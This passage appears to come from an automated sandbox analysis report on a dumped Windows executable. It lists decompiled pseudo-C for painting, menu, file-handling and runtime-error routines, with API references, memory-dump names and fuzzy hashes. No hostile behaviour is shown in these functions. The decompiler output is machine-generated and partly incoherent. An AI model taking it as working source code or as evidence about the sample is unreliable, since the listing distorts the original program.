					return DeleteObject(_v12);
				}
			}

0x0043a425
0x0043a427
0x0043a42c
0x0043a42d
0x0043a42f
0x0043a438
0x0043a444
0x0043a463
0x0043a451
0x0043a457
0x0043a457
0x0043a583
0x0043a46d
0x0043a474
0x0043a47d
0x0043a48b
0x0043a498
0x0043a49e
0x0043a4aa
0x0043a4ba
0x0043a4c8
0x0043a4d7
0x0043a4ec
0x0043a4f4
0x0043a4fb
0x0043a502
0x0043a519
0x0043a527
0x0043a533
0x0043a544
0x0043a54b
0x0043a54e
0x0043a551
0x0043a55e
0x0043a567
0x0043a575
0x0043a575

APIs

GetDC.USER32(00000000), ref: 0043A46F
CreateCompatibleBitmap.GDI32(00000000,?), ref: 0043A493
ReleaseDC.USER32 ref: 0043A49E
CreateCompatibleDC.GDI32(00000000), ref: 0043A4A5
SelectObject.GDI32(?,?), ref: 0043A4B5
BeginPaint.USER32(00000000,?,00000000,0043A576,?,?,?,00000000,00000000,00000000,00000000,?), ref: 0043A4D7
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 0043A533
EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00000000,?), ref: 0043A544
SelectObject.GDI32(?,?), ref: 0043A55E
DeleteDC.GDI32(?), ref: 0043A567
DeleteObject.GDI32(?), ref: 0043A570

Part of subcall function 00439F44: BeginPaint.USER32(00000000,?), ref: 00439F6A
Part of subcall function 00439F44: EndPaint.USER32(00000000,?,0043A06B), ref: 0043A05E

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
String ID:
API String ID: 3867285559-0
Opcode ID: c6ce3e876bf295ee34a86f7ca7c7dd2d1aedf9be2a822b285e77e78c75a6eae6
Instruction ID: 86ebff45ab5d5e5e7902dd9a049ce1f4de68836528b4e3a0ffe90387a61ef89e
Opcode Fuzzy Hash: c6ce3e876bf295ee34a86f7ca7c7dd2d1aedf9be2a822b285e77e78c75a6eae6
Instruction Fuzzy Hash: 5A414D71B00204ABDB00EBA9CC85B9EB7F8AF48704F10447AB50AEB282DA799D158B55

Uniqueness

Uniqueness Score: -1.00%

Function 00442D24, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 170
windowCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00442D24(void* __eax, void* __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, int _a12, int _a16) {
				intOrPtr _v8;
				struct HDC__* _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				int _t85;
				void* _t119;
				void* _t120;
				void* _t129;
				struct HDC__* _t138;
				struct HDC__* _t139;
				int _t140;
				void* _t141;

				_t121 = __ecx;
				_t137 = __ecx;
				_v8 = __edx;
				_t120 = __eax;
				_t46 = E004428C8(__eax);
				if(_t46 != 0) {
					_t144 = _a4;
					if(_a4 == 0) {
						__eflags =  *(_t120 + 0x54);
						if( *(_t120 + 0x54) == 0) {
							_t140 = E004242A0(1);
							 *(_t120 + 0x54) = _t140;
							E004256B8(_t140, 1);
							 *((intOrPtr*)( *_t140 + 0x40))();
							_t121 =  *_t140;
							 *((intOrPtr*)( *_t140 + 0x34))();
						}
						E0041FBEC( *((intOrPtr*)(E00424868( *(_t120 + 0x54)) + 0x14)), _t121, 0xffffff, _t137, _t141, __eflags);
						E00412B80( *(_t120 + 0x34), 0,  &_v44,  *(_t120 + 0x30));
						_push( &_v44);
						_t57 = E00424868( *(_t120 + 0x54));
						_pop(_t129);
						E00420284(_t57, _t129);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E00420704(E00424868( *(_t120 + 0x54))));
						_push(_v8);
						_push(E00442A04(_t120));
						L00426A64();
						E00412B80(_a16 +  *(_t120 + 0x34), _a12,  &_v28, _a12 +  *(_t120 + 0x30));
						_v12 = E00420704(E00424868( *(_t120 + 0x54)));
						E0041FBEC( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0x80000014, _t137, _t141, __eflags);
						_t138 = E00420704(_t137);
						SetTextColor(_t138, 0xffffff);
						SetBkColor(_t138, 0);
						_t85 = _a16 + 1;
						__eflags = _t85;
						BitBlt(_t138, _t85, _a12 + 1,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
						E0041FBEC( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0x80000010, _t137, _t141, _t85);
						_t139 = E00420704(_t137);
						SetTextColor(_t139, 0xffffff);
						SetBkColor(_t139, 0);
						return BitBlt(_t139, _a16, _a12,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
					}
					_push(_a8);
					_push(E004426C4(_t144));
					E00442CFC(_t120, _t144);
					_push(E004426C4(_t144));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E00420704(__ecx));
					_push(_v8);
					_t119 = E00442A04(_t120);
					_push(_t119);
					L00426A64();
					return _t119;
				}
				return _t46;
			}

0x00442d24
0x00442d2d
0x00442d2f
0x00442d32
0x00442d36
0x00442d3d
0x00442d43
0x00442d47
0x00442d8d
0x00442d91
0x00442d9f
0x00442da1
0x00442da8
0x00442db4
0x00442dbc
0x00442dbe
0x00442dbe
0x00442dd1
0x00442de5
0x00442ded
0x00442df1
0x00442df6
0x00442df7
0x00442dfc
0x00442dfe
0x00442e00
0x00442e02
0x00442e04
0x00442e06
0x00442e08
0x00442e17
0x00442e1b
0x00442e23
0x00442e24
0x00442e40
0x00442e52
0x00442e5d
0x00442e69
0x00442e71
0x00442e79
0x00442e9b
0x00442e9b
0x00442e9e
0x00442eab
0x00442eb7
0x00442ebf
0x00442ec7
0x00000000
0x00442eea
0x00442d4c
0x00442d55
0x00442d58
0x00442d62
0x00442d63
0x00442d65
0x00442d6a
0x00442d6e
0x00442d76
0x00442d7a
0x00442d7d
0x00442d82
0x00442d83
0x00000000
0x00442d83
0x00442ef5

APIs

73452430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00442D83
73452430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00442E24
SetTextColor.GDI32(00000000,00FFFFFF), ref: 00442E71
SetBkColor.GDI32(00000000,00000000), ref: 00442E79
BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 00442E9E

Part of subcall function 00442CFC: 73452240.COMCTL32(00000000,?,00442D5D,00000000,?), ref: 00442D12

Strings

A, xrefs: 00442D95

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: 73452430Color$73452240Text
String ID: A
API String ID: 3810274889-2078354741
Opcode ID: 0f851143a4723c1e469f68ae85ed01e11b98bc9687f63f75ec430250f1b258e2
Instruction ID: d0fefe29b67275db9c7b77aa62528a76afe2b693edbbb3a5430c448e5f2d0cae
Opcode Fuzzy Hash: 0f851143a4723c1e469f68ae85ed01e11b98bc9687f63f75ec430250f1b258e2
Instruction Fuzzy Hash: E4510971700114ABDB40FF69DD82F9E37ECAF48318F50016AF905EB286CA78EC418B69

Uniqueness

Uniqueness Score: -1.00%

Function 0043A0A0, Relevance: 15.2, APIs: 10, Instructions: 177
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043A0A0(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E004141BC( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E0041EF40(0x80000010));
							E00412B80( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E0041EF40(0x80000014));
							E00412B80( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E00414218(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
						_t136 = E004141BC( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							E00412B80( *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								E004344B0(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								E00436D28(_t136, _t162, 0xf, 0);
								RestoreDC(_t162, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}

APIs

RectVisible.GDI32(?,?), ref: 0043A159
SaveDC.GDI32(?), ref: 0043A16F
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043A192
RestoreDC.GDI32(?,?), ref: 0043A1AD
CreateSolidBrush.GDI32(00000000), ref: 0043A22E
FrameRect.USER32 ref: 0043A261
DeleteObject.GDI32(?), ref: 0043A26B
CreateSolidBrush.GDI32(00000000), ref: 0043A27B
FrameRect.USER32 ref: 0043A2AE
DeleteObject.GDI32(?), ref: 0043A2B8

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: c4276c5b968bbb51ecb1191cd3375441d771cedfcd47410ac2e995f0bbf811e7
Instruction ID: d7f80e08fa115caa7cc628a2e98c7148b3d638a8714db69d2232ae688719de5f
Opcode Fuzzy Hash: c4276c5b968bbb51ecb1191cd3375441d771cedfcd47410ac2e995f0bbf811e7
Instruction Fuzzy Hash: C55170712042409BDB18DF69C8C4B5B77E8AF48308F04449EED89CB396D739EC54CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00402B40, Relevance: 15.1, APIs: 10, Instructions: 129
fileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00402B40(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x402a94;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E00402AD4;
				}
				_t59[9] = E00402B20;
				_t59[8] = E00402AD0;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E00402AD0;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x4923e4) {
							_push(0xfffffff5);
						} else {
							_push(0xfffffff4);
						}
					} else {
						_push(0xfffffff6);
					}
					_t31 = GetStdHandle();
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E00402AD4;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BC8
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BEC
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402C08
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402C29
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402C52
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402C60
GetStdHandle.KERNEL32(000000F5), ref: 00402C9B
GetFileType.KERNEL32(?,000000F5), ref: 00402CB1
CloseHandle.KERNEL32(?,?,000000F5), ref: 00402CCC
GetLastError.KERNEL32(000000F5), ref: 00402CE4

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: dcb8e97b696e6bc76657cc7b0d214e8e532fd6263ed9e43d8f9e30d2fac3868e
Instruction ID: a6438adf2f580a4a1c5e5da74ce647d5313ec81f7875eed0d703bfc6362872ce
Opcode Fuzzy Hash: dcb8e97b696e6bc76657cc7b0d214e8e532fd6263ed9e43d8f9e30d2fac3868e
Instruction Fuzzy Hash: 6B418270108700AAF7309F248B0D72B76A5EB00754F248E3FE096BA6E0D6FDA885975D

Uniqueness

Uniqueness Score: -1.00%

Function 00450F50, Relevance: 15.1, APIs: 10, Instructions: 74
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00450F50(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x229)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x22f)) != 1) {
							_t48 = GetSystemMenu(E0043C1F4( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 00450F9B
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00450FB9
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00450FC6
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00450FD3
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00450FE0
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00450FED
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00450FFA
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00451007
EnableMenuItem.USER32 ref: 00451025
EnableMenuItem.USER32 ref: 00451041

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: a2d595ded8ba6b339cc18aed0c59235ccb821512961eadbe81d816e5afdcf518
Instruction ID: af257f66785166594afa963312794baf518a67384d1452903d84868792595f0b
Opcode Fuzzy Hash: a2d595ded8ba6b339cc18aed0c59235ccb821512961eadbe81d816e5afdcf518
Instruction Fuzzy Hash: 92214970380340BAE720AB24CDCEF597AD95F08B19F0540A5BA097F6E3C6BCF991861C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0A4, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A0A4(void* __edi) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t10;
				char* _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t22;
				long _t26;
				void* _t34;

				E00409F1C(_t10,  &_v1024, _t34, 0x400);
				_t12 =  *0x491180; // 0x492048
				if( *_t12 == 0) {
					_t14 =  *0x490f5c; // 0x407578
					_t7 = _t14 + 4; // 0xffe8
					_t16 =  *0x492714; // 0x400000
					LoadStringA(E00405AAC(_t16),  *_t7,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t22 =  *0x490fa8; // 0x492218
				E00402D34(_t22);
				_t26 = E00408BD4( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff5),  &_v1024, _t26,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff5), 0x40a154, 2,  &_v1092, 0);
			}

0x0040a0b3
0x0040a0b8
0x0040a0c0
0x0040a113
0x0040a118
0x0040a11c
0x0040a127
0x00000000
0x0040a13d
0x0040a0c2
0x0040a0c7
0x0040a0d7
0x0040a0ea
0x00000000

APIs

Part of subcall function 00409F1C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F39
Part of subcall function 00409F1C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F5D
Part of subcall function 00409F1C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F78
Part of subcall function 00409F1C: LoadStringA.USER32 ref: 0040A00E

GetStdHandle.KERNEL32(000000F5,?,00000000,?,00000000), ref: 0040A0E4
WriteFile.KERNEL32(00000000,000000F5,?,00000000,?,00000000), ref: 0040A0EA
GetStdHandle.KERNEL32(000000F5,0040A154,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A0FF
WriteFile.KERNEL32(00000000,000000F5,0040A154,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A105
LoadStringA.USER32 ref: 0040A127
MessageBoxA.USER32 ref: 0040A13D

Strings

H I, xrefs: 0040A0B8
xu@, xrefs: 0040A113

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleLoadModuleNameStringWrite$MessageQueryVirtual
String ID: H I$xu@
API String ID: 1802973324-3923842764
Opcode ID: 32cabdcad2e6483aa5f0624397b5106cba7b9691167058358ceafcaa585a4e96
Instruction ID: 13a967ae5c580ad2ac90e8131e6b9058e14945a2df50c8333751adfe9f430824
Opcode Fuzzy Hash: 32cabdcad2e6483aa5f0624397b5106cba7b9691167058358ceafcaa585a4e96
Instruction Fuzzy Hash: 3E011EB11043007EE200E7A5CC42F9B77AC9B45718F40463BB755F71E2DA7899548B6A

Uniqueness

Uniqueness Score: -1.00%

Function 004041CC, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 38
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004041CC(void* __ecx) {
				char _v4;
				int _t3;

				if( *0x492048 == 0) {
					if( *0x47601c == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x49221c == 0xd7b2 &&  *0x492224 > 0) {
						 *0x492234();
					}
					_t1 =  &_v4; // 0x475a64
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e, _t1, 0);
					_t2 =  &_v4; // 0x475a64
					return WriteFile(GetStdHandle(0xfffffff5), E00404254, 2, _t2, 0);
				}
			}

0x004041d4
0x00404234
0x00404244
0x00404244
0x0040424a
0x004041d6
0x004041df
0x004041ef
0x004041ef
0x004041f7
0x0040420b
0x00404212
0x0040422c
0x0040422c

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,dZG,00000000,?,0040429A,?,?,?,00000001,0040433A,00402863,004028AB,?,00000000), ref: 00404205
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,dZG,00000000,?,0040429A,?,?,?,00000001,0040433A,00402863,004028AB), ref: 0040420B
GetStdHandle.KERNEL32(000000F5,00404254,00000002,dZG,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,dZG,00000000,?,0040429A), ref: 00404220
WriteFile.KERNEL32(00000000,000000F5,00404254,00000002,dZG,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,dZG,00000000,?,0040429A), ref: 00404226
MessageBoxA.USER32 ref: 00404244

Strings

Error, xrefs: 00404238
dZG, xrefs: 004041F7, 00404212, 004041FB, 00404216
Runtime error at 00000000, xrefs: 004041FE, 0040423D

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000$dZG
API String ID: 1570097196-1623845894
Opcode ID: d2ffed7f8d98215c6a07db0e1ae2cbfceb1bae4e681e6e904f6eddb52037b241
Instruction ID: 56a2d7f83fb72e5fdd31d13c6850d10172e2c0d40c461f73bd65f5ba21560b84
Opcode Fuzzy Hash: d2ffed7f8d98215c6a07db0e1ae2cbfceb1bae4e681e6e904f6eddb52037b241
Instruction Fuzzy Hash: 18F0BBA068038075FA20B3645E07F9A225D4791F19F6086FFB314B40E386FC44CC976E

Uniqueness

Uniqueness Score: -1.00%

Function 0042CEC8, Relevance: 13.7, APIs: 9, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0042CEC8(intOrPtr* __eax, void* __ecx) {
				intOrPtr _v8;
				struct tagRECT _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __ebp;
				void* _t85;
				intOrPtr* _t150;
				void* _t152;
				void* _t158;
				intOrPtr _t165;
				void* _t181;
				signed int _t183;
				void* _t186;
				void* _t188;
